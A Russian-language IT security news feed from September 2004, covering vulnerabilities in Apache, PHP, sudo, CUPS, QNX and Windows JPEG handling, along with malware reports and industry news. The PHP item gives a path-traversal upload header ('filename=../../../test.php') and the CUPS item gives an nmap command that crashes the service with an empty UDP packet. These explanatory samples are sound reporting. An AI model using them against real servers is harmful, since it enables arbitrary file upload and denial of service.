Вышла новая версия самого лучшего фильтра борьбы со спамом SpamAssassin-3.0. Среди изменений/улучшений: SPF (sender policy framework), SURBL, plugins, хранение auto-whitelist и Bayes в SQL базе, новые правила, а также увеличена скорость проверки сообщений.
Подробности

23/09/2004 18:47 Sony поддержит МР3
В среду Sony подтвердила, что она работает над добавлением естественной поддержки МР3 в свои портативные музыкальные плееры — этот крутой разворот стратегии поможет компании эффективнее бороться с такими конкурентами, как Apple Computer. Отказ от опоры исключительно на свой собственный формат начнется с плееров на базе флеш-памяти, но конкретных планов и сроков выпуска продуктов с поддержкой МР3 пока нет. Первым об изменении стратегии Sony на европейском рынке сообщила ZDNet France. Представитель Sony в США сказал, что и здесь ожидаются аналогичные перемены. Компания проводит ревизию своей политики в отношении МР3 в тот момент, когда конкуренция на рынке цифровой музыки накаляется, и перед компанией маячит угроза остаться позади. Неожиданный шаг может предвещать дальнейшее серьезное изменение стратегического курса гиганта потребительской электроники с важными последствиями для становления рынка онлайновой музыки. Хотя МР3, несомненно и с большим отрывом, является самым популярным форматом файлов цифровой музыки, сегодня устройства Sony проигрывают только файлы в ее собственном запатентованном формате Atrac. Обычно эти устройства работают с файлами МР3 и другими форматами, конвертируя их в Atrac — это громоздкий процесс, который может занимать много времени, особенно на устройствах с относительно малым объемом памяти, таких как флеш-плееры. Эта особенность создает преимущество конкурентам Sony, таким как Apple, чей лидирующий на рынке плеер iPod поддерживает МР3 наряду с проприетарным ПО защиты цифровых прав FairPlay.
ZDNet

23/09/2004 18:23 Сайт для зарубежных американских избирателей оказался недоступен из-за рубежа
Американское военное ведомство расширило доступ к интернет-сайту FVAP.gov, доступ к которому ранее был существенно ограничен из соображений безопасности, сообщает Reuters. FVAP (Federal Voting Assistance Program) - ресурс для граждан США, находящихся за пределами страны и намеревающихся голосовать на предстоящих выборах президента США в посольствах США по месту пребывания. На сайте размещается информация, необходимая для связанных с этим процедур. Сайт FVAP поддерживается Пентагоном, так как власти США в первую очередь стремятся обеспечить возможностью проголосовать американских военных, несущих службу на зарубежной территории. Пентагон тщательно защищает свои информационные сети от несанкционированного проникновения - из-за этого многие американцы, находящиеся за пределами США, при попытке попасть на FVAP обнаруживали, что доступ к сайту из той или иной сети страны, где они находятся, закрыт. Это послужило причной для многочисленных жалоб от американских граждан, в результате чего военная администрация приняла решение расширить список сетей, из которых доступен сайт. Вместе с тем, технические специалисты Пентагона оставили за собой право блокировать сети, которые им представляются опасными, и не гарантировали, что доступ к сайту может получить любой желающий.
Подробности

23/09/2004 17:51 Уязвимость а Apache
Apache Week сообщает об обнаруженной проблеме, связанной с безопасностью в Apache, которая может позволить злоумышленникам обойти установленные проверки доступа. Проблема, как сообщается, происходит из-за ошибки в обработке директивы "Satisfy" и присутствует только в версии 2.0.51. Рекомендуется обновить версию до 2.0.52-dev, где данная ошибка исправлена.
Источник

23/09/2004 14:46 Опубликован эксплойт, использущий графический дефект Windows
Как пишет CNews.com в среду в интернете распространилась программа, представляющая из себя пример, как взламывать Windows-системы, воспользовавшись уязвимостью в обработке широко распространенного графического формата jpeg. Эксперты дожидались появления подобного кода, за которым, как считается, должен последовать новый раунд вирусных атак на незащищенные компьютеры под Windows с использованием данной уязвимости. Напомним, что информация о данной уязвимости была опубликована M$ сравнительно недавно. Уязвимость присутствует в библиотеке GDIPlus.dll и связана с некорректной проверкой длины поля комментариев в JPEG-файлах. В результате можно добиться переполнение буфера, что в конечном итоге теоритически может привести к выполнению произвольного кода на уязвимой машине. Программа, получившая распространение в интернет, содержит последний код эксплоита и пример, как с помощью него атаковать систему. Именно с широким распространением и общедоступностью подобной программы связаны опасения специалистов по поводу скорого появления новой волны вирусов, использующих эту дыру, т.к. вир-мейкеры неприменно начнут использовать это в своих творениях. Подобная ситуация наблюдалать за несколько дней перед появлением вирусов Sasser и MSBlast.
Источник

23/09/2004 14:37 «Касперский» и ВМК МГУ будут сотрудничать
Сайт "Вебпланета" сообщила, что 22 сентября 2004 года на факультете вычислительной математики и кибернетики (ВМК) Московского Государственного Университета (МГУ) им. М. В. Ломоносова прошла встреча представителей «Лаборатории Касперского» с руководством факультета. Во время встречи было подписано Соглашение о намерениях, где стороны договорились о взаимном оказании услуг в области развития систем информационной безопасности. Речь идет о проведении научно-исследовательских работ, тестировании продуктов «Лаборатории Касперского», стажировке студентов факультета в компании. Особое внимание планируется уделить организации системы информационной безопасности факультета ВМК МГУ с использованием программного обеспечения «Лаборатории Касперского». Также будет вестись сотрудничество в области разработки учебных курсов для студентов по различным аспектам информационной безопасности, проведении курсов повышения квалификации и семинаров для сотрудников и партнеров «Лаборатории Касперского», организации маркетинговых и иных мероприятий, направленных на популяризацию знаний в области информационной безопасности (конкурсы, олимпиады, конференции, семинары и т.п.).
"Вебпланета"

23/09/2004 14:36 Червь массовой рассылки Gilp
Компания Sophos предупреждает о появлении нового вируса Gilp, заражающего компьютеры с операционными системами Windows. Червь Gilp распространяется по электронной почте в виде вложений с именем Setup.exe. Причем в теме сообщений всегда указано слово "Setup", а в текст вставлен смайлик ":)". После активации вредоносная программа записывает на жесткий диск файл rpcsrv.exe и регистрирует его в секции автозапуска WIN.INI . Далее червь осуществляет массовую рассылку собственных копий по найденным на машине-жертве адресам при помощи встроенного SMTP-сервера. Каких-либо деструктивных функций в коде Gilp специалисты компании Sophos не обнаружили.
Источник

23/09/2004 14:35 Троян Malam открывает "черный ход" в систему
Компания Panda Software обнаружила в интернете вредоносную программу Malam, инфицирующую компьютеры под управлением операционных систем Microsoft Windows. Троян Malam попадает на машину при посещении пользователями определенных веб-сайтов, ссылки на которые распространяются по электронной почте. После проникновения на ПК Malam создает на жестком диске несколько файлов и регистрируется в ключе автозапуска реестра. Далее троян изменяет стартовую страницу браузера Internet Explorer на http://Microsoft.oem101.biz и открывает "черный ход" в систему, через который злоумышленники могут выполнять на зараженном компьютере произвольные действия. Широкого распространения вредоносная программа пока не получила.
Источник

22/09/2004 18:40 Новый вид рекламы - игра
До чего же изобретательны специалисты в области рекламы и маркетинга. Сейчас в России рекламщики активно развивают новое направление - распространение игр носящих в себе элемент рекламы. В случае с онлайн продуктами или проектами имеющими отношение к сети - это как правило флеш-игры онлайн. Уже прыгает по просторам рунета веселая зебра, явно имеющая отношение к Zebra Telecom. А "Лаборатория Касперского" предлагает поохотиться на вирусы. Конкурс-игру под таким названием проводят совместно "Компьютерра on-line" и "Лаборатория Касперского", где в флеш-аркаде участникам предлагается "настрелять" побольше вирусов и набрать больше всех очков. В качестве призов, естественно, различные продукты лаборатории и несколько комплектов годовых лицензий.
Условия конкурса

22/09/2004 18:38 Секьюрити-фирма предлагает работу автору Sasser
Юный писатель вирусов, арестованный за создание червя Sasser, получил приглашение от работодателя. 18-летний немец Свен Яшан, которого считают также ответственным за эпидемию вируса Netsky и который ожидает суда, может получить высокооплачиваемую работу в германской компании Securepoint, специализирующейся на брандмауэрах. Securepoint готова обучить бывшего злоумышленника делу секьюрити-программирования. Компания хочет нанять исправившегося script kiddy за его знания в этой области и желание получить шанс реабилитировать себя. Однако возможно, что обучение Яшана придется отложить на несколько месяцев — а то и лет. Юноше предъявлены обвинения, среди прочего, в манипуляции данными и компьютерном саботаже, что может означать для него тюремное заключение сроком до пяти лет. Яшан считается ответственным за 70% всех вирусных инфекций первого полугодия этого года и за причинение ущерба, оцениваемого в несколько миллионов долларов.
zdnet.ru

22/09/2004 18:35 Sun создает всемирный резерв вычислительной мощности
Во вторник Sun Microsystems предприняла первый шаг в направлении будущего, в котором, как она утверждает, вычислительная мощность станет продаваться как товар, наподобие электроэнергии.
На специальной пресс-конференции в Нью-Йорке операционный директор Sun Джонатан Шварц представил службу, посредством которой заказчики могут решать некоторые вычислительные задачи на принадлежащих Sun машинах по цене $1 на процессор в час. Пока возможности данной технологии ограничены, но Sun надеется, что она расцветет настолько, что такие организации, как фондовые биржи, располагающие излишками обрабатывающей мощности, смогут поставлять их в вычислительную сеть (computing grid) таким же образом, как дома, оборудованные солнечными панелями, продают электросети излишки электроэнергии.
Далее

22/09/2004 11:05 Уязвимости в PHP
Сообщается о двух обнаруженных уязвимостях в PHP, которые потенциально могут быть использованы злоумышленниками для раскрытия конфиденциальной информации и атаки на уязвимую систему. Первая проблема связана с ошибкой при проверки границ при обработке переменных GET, POST и COOKIE в модуле "php_variables.c". Это приводит к тому, что при передаче специально сформированного параметра (он должен оканчиваться на открытую скобку - например: "abc[a][" ) происходит "утечка" памяти, не высвобождается буфер, расположенный в куче. Уязвимость присутствует в версиях 4.1.2 - 5.0.1.
Вторая проблема связана с глобальной переменной "$_FILES" - массивом, в котором хранятся локальные имена файлов, полученных в запросе (uploaded files). Проблема заключается в том, что этот массив возможно перезаписать специально созданным "Content-Disposition" заголовком в запросе. Это потенциально может быть использовано злоумышленниками для загрузки (upload) файлов в произвольное место, что в конце концов может позволить запустить произвольный скрипт на уязвимой системе.
Пример: Content-Disposition: form-data; name="userfile"; filename="../../../test.php"
Для успешного использования этой уязимости требуется чтобы в php-скрипте, на который происходит атака, использовалась переменная "$_FILES". Уязвимость присутствует в версиях 5.0.1 и более ранних.
Уязвимости исправлены, новые версии находятся в CVS репозитории.
Описание

22/09/2004 10:39 Уязвимость в sudo
Валерий Резник (Reznic Valery) сообщил об обнаруженной уязвимости в sudo, которая может позволить локальным пользователям получить доступ на чтение к произвольному файлу. Проблема заключается в неправильной проверке сим-линков (symbolic links) когда sudoedit ("sudo -u") копирует временные файлы. Путем подмены временного файла на который ссылается сим-линк можно получить доступ на чтение произволного файла. Однако чтобы воспользоваться уязвимостью требуется наличие прав на запуск sudoedit (sudo -u option). Уязвимость присутствует в версии 1.6.8. Рекомендуется обновить версию до 1.6.8p1.
Подробности

21/09/2004 11:44 FreeBSD латает уязвимость в CVS
В вышедшем бюллетене FreeBSD-SA-04:14 описывается уязвимость в популярной в мире открытых систем службе CVS (Concurrent Versions System - позволяет оперативно отслеживать изменения в ПО и тут же обновлять это ПО). Новая версия устраняет около 7 уязвимостей, в числе которых: некорректная обработка вводимых данных при обработке "Entry", целочисленное переполнение при обработке команд "Max-dotdot", ошибки при обработке команд "Notify", уязвимость форматной строки в wrapper CVS. Также устранена уязвимость о которой сообщила iDEFENSE - связана с некорректной обработкой входных данных при задании путевого имени. При этом использовался недокументированный флаг, предназначенный для отладки программы.Последствия уязвимостей различны - получение критичных системных данных, DoS, возможность выполнения произвольного кода. Обновления для боевых версий FreeBSD выпущены.
Бюллетень по безопасности

21/09/2004 10:41 AOL разработала устройство PassCode для защиты доступа
Провайдер интернет-услуг America Online (AOL) начал продажу устройства AOL PassCode, обеспечивающего безопасность работы в компьютьерных сетях. AOL PassCode разработан AOL совместно с компанией RSA Security. Устройство является переносным; на его мониторе ежеминутно обновляется шестизначный код доступа к конфиденциальной информации. По мнению разработчиков, устройство обеспечивает более надежную защиту, чем обычный пароль пользователя. Устройство AOL PassCode стоит $9,95; абонентская месячная плата за пользование соответствующим сервисом составляет от $1,95 до $4,95.
CNews

21/09/2004 10:28 Троян Surila запрещает обновления антивирусных баз данных
"Лаборатория Касперского" сообщает об обнаружении вредоносной программы Surila. Троян Surila написан на языке Microsoft Visual C++ и инфицирует компьютеры под управлением операционных систем Windows. После проникновения на машину Surila создает на жестком диске свою копию с именем dx32cxlp.exe и регистрирует ее в ключе автозапуска реестра. Далее троян пытается соединиться с несколькими IRC серверами с целью получения дальнейших указаний от автора. Кроме того, вредоносная программа делает невозможной загрузку обновлений антивирусных баз данных и запрещает доступ к веб-сайтам компаний, специализирующихся на вопросах сетевой безопасности.
Описание

21/09/2004 09:54 Интернету угрожает эпидемия вирусов-спамеров
Количество персональных компьютеров, массово заражаемых вирусами-"роботами" и используемых злоумышленниками в корыстных интересах, растет устрашающими темпами, сообщает BBC News со ссылкой на отчет, представленный в понедельник компанией Symantec. По мнению экспертов, взрывной рост инфицируемых машин объясняется "сменой ориентиров" хакеров - если раньше их целью было приобретение популярности в кругах себе подобных, то теперь приоритетом становится обогащение. Наблюдается тенденция к объединению усилий спамеров и авторов вирусов. "Вирусописатели" заражают домашние компьютеры, имеющие выход в Интернет через широкополосные сети, программами рассылки спама, а затем сдают такие сети из компьютеров-"зомби" спамерам в аренду. Стоимость пользования сетью из нескольких тысяч инфицированных машин может достигать 50 долларов в час, за это время могут быть разосланы миллионы писем. По данным Symantec, за первую половину года среднее количество ежедневно заражаемых вирусами-"роботами" персональных компьютеров выросло с двух до 30 тысяч. Рекордом стало заражение за один день 75 тысяч компьютеров, случившееся, когда создатели вирусов MyDoom и Bagle вели так называемую "онлайн-войну", приведшую к появлению огромного числа разновидностей этих программ. Большинство вирусных атак направлено на компьютеры, использующие операционную систему Windows компании Microsoft. Symantec сообщает о 4496 вирусах для этой системы, появившихся только за первую половину 2004 года, что вдвое больше, чем за весь 2003 год. Специалисты ожидают также рост количествa вирусов для операционной системы Linux и мобильных устройств - КПК и сотовых телефонов.
Lenta.Ru

21/09/2004 09:29 Rainbow Technologies представит новые продукты
Компания Rainbow Technologies представляет новые продукты на выставке Infosecurity 2004. С 21 по 23 сентября проводится специализированная выставка Infosecurity 2004 для профессионалов в сфере информационной безопасности. Выставка пройдет в выставочном комплексе Гостиный Двор (ул. Ильинка, 4). Rainbow Technologies будет представлена на стенде №511. На стенде Вы сможете познакомиться и увидеть в работе оборудование, обеспечивающее защиту корпоративных данных, сетей предприятий различного масштаба, безопасный удалённый доступ пользователей к корпоративной информации. Представляемое на стенде оборудование: iKey - портативные устройства 2-факторной аутентификации, поддерживающие PKI и не требующие специальных устройств для считывания информации. RFiKey — контроль доступа к корпоративным данным в сети и физического доступа в помещения на базе proximity-чип пр-ва HID Corporation. SafeEnterprise iGate – устройство для обеспечения безопасной связи мобильных и удаленных пользователей с центральным офисом. WatchGuard FireBox X – интегрированные устройства для защиты сетей предприятий любого масштаба, включающие множество функций защиты, таких как полноценное сетевое экранирование, предупреждение об атаках, VPN, фильтрацию на уровне приложений, блокирование спама, службу фильтрации содержимого web-сайтов и др. WatchGuard Firebox Edge – межсетевые экраны для защиты сетей небольших организаций или филиалов (удаленных офисов) крупных и средних предприятий.
Rainbow Technologies

21/09/2004 00:43 Взломан хостинг компании ЗАО "Метроком"
Хостинговая площадка одного из крупнейших хостинг-провайдеров Петербурга была подвергнута взлому. Практически на всех веб-сайтах, расположенных на этом хостинге, при взломе было добавлено всплывающие окно с текстом под заголовком "Олигархи расставляют кадры в Северо-Западном Федеральном округе". Жертвами хулиганских действий хакеров стали такие популярные сайты, как сайт "Петербургского метрополитена", сайт самой компании "ЗАО "Метроком"", сайт "Комитета финансов Администрации Санкт-Петербурга" и многие другие их клиенты, в том числе - ряд сотовых операторов Питера.

20/09/2004 21:08 В Windows ‘Longhorn’ встроят защиту от копирования компакт-дисков?
Американские рекорд-леблы ведут переговоры с компанией Microsoft относительно внедрения в следующую версию Windows технологии защиты от несанкционированного копирования компакт-дисков. На сегодняшний день, как сообщает агентство CNET, Microsoft не говорит ни «да», ни «нет». Все, что есть у рекорд-лейблов, это набор инструкций и рекомендаций, предложенный разработчикам CD-защиты. В свою очередь, сама Microsoft получила от международного звукозаписывающего лобби список «желательных» функций, которые могли бы превратить Longhorn в сущий ад для пользователей, привыкших выпекать кустарные сборки со свежих компактов. Например, система могла бы определить тип вставленного в CD/DVD-привод компакт-диска и автоматически применить к нему набор правил, записанных прямо на компакте. В числе таких правил может быть заложен лимит на количество копий, снимаемых с одного диска, или же ограничение на последующие операции с «вырезанными» с диска файлами. Впрочем, источники, близкие к высоким договаривающимся сторонам, утверждают, что звукозаписывающие компании не жаждут крови и рассчитывают, что встроенная в Windows система защиты от копирования компакт-дисков будет так же дружелюбна и незаметна для пользователя, как хорошо известная владельцам компьютеров Apple система iTunes. Принимая во внимание репутацию Microsoft в области пользовательского интерфейса, следует отметить, что надежды рекорд-лейблов выглядят в данном контексте несколько наивными.
Internet.Ru

20/09/2004 20:33 Подробности о вирусе CE.Dust
Как известно, в июле сего года в Интернет появилась информация о первом вирусе, написанном для ОС Windows CE (она же Windows Mobile), применяемой в смартофонах и Pocket PC. Компанией Airscanner Corp. выпущен анонс о том, что компания детально разобрала код вируса (в тесном сотрудничестве с автором, кстати) и опубликовала детальный обзор используемой им уязвимости. Дело в том, что модель безопасности архитектуры Windows CE.NET предусматривает работу ядра в защищённом режиме. Этот режим предусматривает полную изоляцию ядра системы от пользовательских приложений. Однако (как зачастую бывает у Microsoft), была обнаружена возможность взаимодействовать с ядром напрямую от пользоательских приложений, используя модуль "coredll". Эта возможность может быть осуществлена с использованием функции "kdatastruct". Эту-то "особенность" и использовал вирус. Сообщается, что создателем вируса является некто Ratter из команды вирусописателей 29a (16-ричный эквивалент 10-чного "666"), который и передал вирус господам из Airscanner Corp. Собственно, сам вирус довольно безобиден и, по-видимому, использован исключительно в демонстрационных целях.
Описание вируса
Исходный код вируса

20/09/2004 16:32 Уязвимость в CUPS
Обнаружена уязвимость в широкоприменяемом в мире открытых систем ПО CUPS (Common UNIX Printing System). Уязвимость позволяет удалённо "отключить" службу CUPS и ограничена локальной сетью. Вызвать DoS можно послав пустой UDP-пакет на порт 631 (например, nmap -sU -p 631 naive.org). Связана уязвимость с некорректной интерпретацией ситуации в коде recvfrom() == 0 (воспринимается, как ошибка). Также автором исправлено возможное переполнение буфера при приёме большой UDP-дейтаграммы. Выпущена новая версия программы - 1.1.21rc2.
Описание

20/09/2004 15:21 Совет Европы призвал мир объединиться для борьбы с киберпреступлениями
Для успешной борьбы с киберпреступлениями должна существовать масштабная международная коалиция, к которой должно присоединиться максимально возможное количество стран. К такому заключению пришли делегаты специального саммита, прошедшего в минувшую пятницу в Страсбурге, сообщает сайт News.com. Участниками саммита стали представители правительств, деловых и правоохранительных структур. Во время встречи они обсуждали ратификацию Конвенции Совета Европы по киберпреступлениям. До недавнего времени Конвенция была подписана 30 государствами. Однако лишь 8 из них согласовали положения Конвенции с национальным законодательством. В частности, Великобритания подписала Конвенцию, но до сих пор ее не ратифицировала. В числе стран, подписавших документ, есть несколько государств за пределами Европы. Международный статус Конвенции порой служит препятствием для ее принятия некоторыми правительствами. Они опасаются того, что им, возможно, придется предоставлять данные о собственных гражданах другим правительствам. Например, США еще в 2002 году отказались подписывать Конвенцию, поскольку она противоречит положениям конституции страны.
Viruslist

20/09/2004 14:45 Недельный отчет о вирусах Panda Software
Опубликован традиционный еженедельный отчёт о вирусной активности прошедшей недели от Panda Software. В отчёте рассмотрены четыре червя: Evaman.D, Mydoom.AB, Mydoom.Z и Mydoom.X.
Отчёт

20/09/2004 14:17 Microsoft рассекретила свои коды для правительственных организаций
Компания Microsoft рассекретила для 60 правительственных и международных организаций исходные коды некоторых своих продуктов, в частности последних версий программ из пакета Office: Outlook, Word, Excel. Как сообщает Assosiated Press, Билл Гейтс и его корпорация, по всей видимости, решили не отставать от конкурентов, которые изначально делают коды своих программ доступными этой категории пользователей. Microsoft уже предоставила тем же самым организациям открытый доступ к операционной системе Windows. По словам менеджера программы Shared-source ("доступные ресурсы") Джейсона Матусова (Jason Matusow), тридцать правительств, в том числе власти России, Китая, Норвегии и Великобритании согласились подписать так называемую "свободную лицензию". США поначалу заинтересовалась этой программой, но впоследствии отказалась в ней участвовать. К пакету Office в данный момент получила доступ только Великобритания. В последнее время многие правительства, отмечает Assosiated Press, с растущей заинтересованностью следят за новыми разработками основных конкурентов Microsoft, например за операционной системой Linux. По мнению многих пользователей, она проще в обращении и обеспечивает большую безопасность хранения данных. Несмотря на то, что Microsoft Office по-прежнему является самым популярным ПО в сфере бизнеса и политики, все больше сторонников появляется и у разработки компании Sun Microsystems Inc.'s - пакета приложений StarOffice, основанной на бесплатной программе OpenOffice.
Подробности

20/09/2004 10:51 Symantec приобретает @stake
Symanteс и @stake подписали соглашение о намерениях, предполагающее поглощение последней в октябре этого года, сообщает bugtraq.ru. @stake, организованная в свое время на основе известной группы L0pht, известна в первую очередь своей программой аудита паролей L0phtCrack и средством поиска программных уязвимостей SmartRisk Analyzer, а также предоставляет консалтинговые услуги. Это поглощение неплохо сочетается с аналогичной покупкой McAfee, прикупившей в августе Foundstone, также специализирующуюся на поиске уязвимостей.
Подробности

20/09/2004 10:34 Via предлагает свободную программу для очистки диска
Пытаясь популяризовать новую функцию своего процессора, компания Via Technologies выпустила программное обеспечение с открытым исходным кодом, предназначенное для надежного стирания удаленных файлов. Intel-совместимые чипы тайваньской фирмы, такие как C3, Eden и Antaur, содержат генератор случайных чисел, полезный для решения таких задач, как ускорение выполнения некоторых операций при шифровании. На этой неделе компания выпустила программу open-source под названием Tru-Delete, которая заполняет ненужные файлы случайными цифрами. Очищающее ПО может оказаться полезным для тех компаний, которым нужно защитить секретную информацию, особенно в компьютерах, которые могут быть украдены. Кроме того, оно затрудняет правоохранительным органам восстановление улик в процессе расследований. Для тех, кто хочет насовсем удалить нежелательные файлы из соображений безопасности или сохранения тайны частной жизни, заполнение файлов случайными цифрами вместо, скажем, простой последовательности нулей, затрудняет восстановление информации. Via утверждает, что ее аппаратура ускоряет процесс очистки диска, так как процессору не надо исполнять обременительное ПО генерации случайных чисел. Via выпустила ПО по лицензии General Public License, по которой распространяется Linux и многие другие проекты open-source. Имеются версии программы для Linux, Windows и Windows CE.
Страница загрузки утилиты

20/09/2004 10:23 "Би Лайн" опять "упал" в прошлую среду
В среду в 8:30 утра в московской сети "Би Лайн GSM" возникли неполадки программного обеспечения одного из коммутаторов, что привело к блокировке ряда контроллеров, сообщает пресс-служба ОАО "Вымпелком", предоставляющего услуги сотовой связи под этой торговой маркой. По сообщению пресс-службы, 'к 9:00 проблему удалось устранить, однако она возникла вновь, а предпринятые ранее действия не помогли решить ее повторно'. Проблема обусловлена блокировкой контроллеров, что при существующей интенсивности трафика привело к нехватке свободных каналов. Заблокированными остаются 9 контроллеров из 22. В настоящее время возможны затруднения при установке соединения в сети 'Би Лайн GSM' в районах запада, северо-запада, севера, северо-востока и востока Москвы, а также на севере Московской области. Сейчас технические службы 'Вымпелкома' совместно с поставщиками программного обеспечения и оборудования работают над восстановлением корректного функционирования сети. Ориентировочное время восстановления - 15:00, сообщает компания.
"Газета"

20/09/2004 10:09 Департамент госбезопасности Литвы закрыл сайт "Кавказ-центр"
Департамент госбезопасности Литвы временно заблокировал сайт чеченских сепаратистов "Кавказ-центр". Об этом сообщил в субботу РИА "Новости" пресс-секретарь департамента Витаутас Макаускас. По его словам, сотрудники органов безопасности перекрыли технологические каналы, по которым литовская фирма Elneta осуществляла передачу данных с этого сайта. Гендиректор Elneta Римантас Пашис вызван в Департамент госбезопасности для дачи разъяснений. Макаускас отметил, что литовские законы позволяют приостанавливать на время расследования деятельность средства массовой информации, если оно явно занимается распространением информации, пропагандирующей терроризм, разжигающей межнациональную и межрелигиозную рознь. Решение о том, что деятельность интернет-сайта чеченских сепаратистов должна быть прекращена, было принято в минувшую пятницу на заседании Совета обороны Литвы под председательством президента Валдаса Адамкуса. На самом сайте висит объявление на русском, английском и турецком языках, гласящее, что сайт закрыт временно, до окончания судебного разбирательства о "целесообразности дальнейшего нахождения сервера Кавказ-Центра на территории Литвы".
РИА "Новости"

19/09/2004 21:52 В деле о краже исходников Cisco появился подозреваемый
Оказывается, еще 3 сентября британская полиция задержала подозреваемого в краже исходников Cisco IOS, сообщает bugtraq.ru. 20-летний англичанин, имя которого не называется, был отпущен под залог до начала ноября, изъятое у него компьютерное оборудование исследуется.
Подробности

19/09/2004 21:31 Уязвимость в GNU Radius
iDEFENSE обнаружена уязвимость в популярном пакете обеспечения удалённой аутентификации и учёта пользователей GNU Radius. Уязвимость присутствует в функции asn_decode_string() программы snmplib/asn1.c, в которой можно вызвать целочисленное переполнение. В результате может быть вызвано обращение за пределы выделенной области памяти, что, в свою очередь, приводит к аварийному завершению службы. Для того, чтобы система была уязвима, служба должна быть собрана и подключена с поддержкой SNMP, чего нет по умолчанию. Уязвимость устранена в вышедшей версии 1.2.94.
Подробности

19/09/2004 21:17 AOL отказалась поддерживать Microsoft Sender ID
Компания AOL не будет поддерживать антиспамовую технологию Sender ID от Microsoft. AOL приняла данное решение принимая во внимание негативное отношение к данной технологии группы IETF (Internet Engineering Task Force), а также сообщества разработчиков ПО с открытым кодом. Однако представители AOL заявили, что компания будет продолжать поддерживать технологию Sender Policy Framework (SPF), которая входила в состав Sender ID. Кроме того, AOL будет публиковать файлы Sender ID. Также представители AOL заявили, что технология Sender ID не вполне совместима с оригинальной спецификацией SPF
SecurityLab

19/09/2004 20:45 MyDoom.Y озадачил антивирусные фирмы
Последняя версия червя MyDoom содержит описание его работы и фотографию создателя вируса Netsky Свена Яшана. На этот раз авторы зачем-то вставили в код MyDoom.Y подробное описание того, что он делает и как функционирует. Эта странная тактика вызвала недоумение у поставщиков антивирусного ПО. «Похоже, что они хотели помочь нам, что знаменательно, — говорит директор F-Secure по антивирусным исследованиям Микко Хиппонен. — Фото может намекать на то, что MyDoom выиграл войну вирусов. Но, опять же, Netsky распространился гораздо шире, чем MyDoom». Описание вируса содержит две подписи, Nemog и Zincite, которые Хиппонен уже видел раньше в коде back-door. «Мы не знаем, подложные они или подлинные», — сказал он. Яшан, который обвиняется полицией Германии в создании нескольких вариантов вируса Netsky, считается ответственным за 70% эпидемий компьютерных вирусов, поразивших интернет в этом году.
ZDNet

19/09/2004 20:41 Выход Apache 2.0.51
Apache Software Foundation cообщает о выходе новой версии популярного Вэб-сервера Apache - 2.0.51. Новая версия, как написано в анонсе устраняет аж 5 уязвимостей.
Анонс

19/09/2004 20:27 Об уязвимости в обработке JPEG
Во-первых, приносим свои извинения за то, что наш сайт лежал в течение нескольких дней в силу обстоятельств от нас не зависящих. Во-вторых, опубликован детальный отчёт об уязвимости в механизме обработки JPEG-файлов во многих Windows-продуктах. Как и говорилось ранее, уязвимость присутствует в динамической библиотеке GDIPlus.dll (обнаружена eEye). Связана с некорректной проверкой длины поля комментариев (COM-секция) - при задании длины этого поля, равной 1 или 0 можно сформировать JPEG-файл, вызывающий при его обработке переполнение буфера при перезаписи структуры управления кучей. Выпущен также эксплоит, который, как предполагают специалисты может быть использован для распространения очередных вирусов и троянов. Опубликована сигнатура JPEG-файла, которая может быть использована различными антивирусами и IDS для определения попытки вторжения.
Описание
Эксплоит

15/09/2004 20:52 Аналог BSD Jail для Linux
Serge Hallyn опубликовал патч, реализующий функциональность наподобие jail в FreeBSD, используя возможности LSM (Linux Security Modules) подсистемы в Linux (для 2.6.x ядер). Процессы работающие в jail окружении, привязаны к определенному IP и не могут: выполнять операции монтирования, посылать сигналы внешним процессам, создавать устройства, подгружать модули ядра, управлять приоритетом выполнения, создавать raw-сокеты, использовать внешние IPC блоки и изменять настройки сетевой подсистемы. Для jail окружения создается отдельная, изолированная, иерархия /proc/. Кроме того, патчи поддерживают работу с IPv6.
Подробности и пример

15/09/2004 17:10 И ещё раз об уязвимости Windows в обработке JPEG
M$, как известно опубликовала бюллетень MS04-028, в котором описывается уязвимость в обработке JPEG-файлов (присутствует в обработке секции комментариев) с использованием библиотеки GDIPlus.DLL. M$ также опубликовал рекомендации для устранения уязвимости. Первое - обновить ОС через Windows Update (для Windows XP, Windows XP SP1, Windows Server 2003), кстати, на сайте пишут, что XP SP2 не обладает уязвимости и требует только обновления Оффиса (если установлен, есесвенно). Второе - обновить сам Office. Третье - M$ выпущен специальный ActiveX-скрипт, позволяющий проверить есть ли на компьютере уязвимые приложения. Четвёртое - обновить ПО (если присутствует), которое обрабатывает графические файлы (например, Greetings, Picture It!, Digital Image Pro). Ну, и пятое - если Вы используете ПО для разработки - то и его надо обновить - см. прилагающийся список.
Подробности

15/09/2004 16:48 Множественные уязвимости в QNX.
Господа из бразильской группы rfdslabs сообщают об обнаружении сразу 3-х уязвимостей в популярной в мире риал-тайм ОС QNX. Первая уязвимость связана с наличием дыры во встроенном ftp-клиенте, присутствующей в обработке команды 'quote'. Используя эту уязвимость (типа формата строки) можно повысить свои привилегии до группы 'bin' (что довольно много в ОС). Вторая уязвимость обнаружена в microGUI графической системы Photon. уязвимость присутствует в 4-х компонентах этого GUI - phrelay-cfg, phlocale, pkg-installer, input-cfg. Сформировав большое значение параметра -s (сервер) (автор говорит о 94 символах 'A'), можно вызвать переполнение буфера. А так как все компоненты имеют установленный флаг SUID и хозяином рута - последствия очевидны. Третья уязвимость присутствует в crttrap, являющемся внешней программной частью Photon и вызывающим последовательность команд до вызова 'io-graphics'. Сама утилита предназначена для определения видеокарты и соотнесения ей необходимого драйвера. Уязвимость типа race condition позволяет модифицировать переменные среды и обмануть утилиту. Самое печальное во всей этой истории - что разработчик никак не прореагировал на сообщение об уязвимости. Кроме того, как замечают авторы, QNX в качестве риал-таймовой ОС применяется в очень важных областях деятельности - медицинское оборудование, роутеры, сервис службы 911, системы управления воздушным и железнодорожным движением и т.д.
Первая уязвимость
Вторая уязвимость
Третья уязвимость

15/09/2004 12:27 Статья об атаках на Вэб-сервер Apache.
На сайте DevShed опубликована статья, представляющая собой выдержку из книги "Hardening Apache" (автор - Tony Mobily), выпущенной Apress в 2004 г. В статье приводятся наиболее типичные виды атак на Вэб-сервер, уязвимости, обнаруженные в Apache.
Статья

15/09/2004 11:52 Linux или FreeBSD? Без гнева и пристрастия
Под таким заголовком опубликована статья Алексея Федорчука на сайте iXBT. Автор пытается непредвзято рассмотреть различные положительные и отрицательные стороны в применении первой и второй ОС в качестве десктопной ОС. Как пишет сам автор во ступлении: "Заметка эта родилась в ходе многочисленных переходов с одной системы на другую, в ходе многолетнего (во временных масштабах IT) их совместного использования, а также в ходе размышлений на тему: а какую бы систему мне поставить на новую машину? Непосредственным же толчком для нее послужила переписка с рядом авторов unix.gingas.ru и мечты об идеальном дистрибутиве, обсуждавшиеся давеча на Linuxforum".
Cтатья

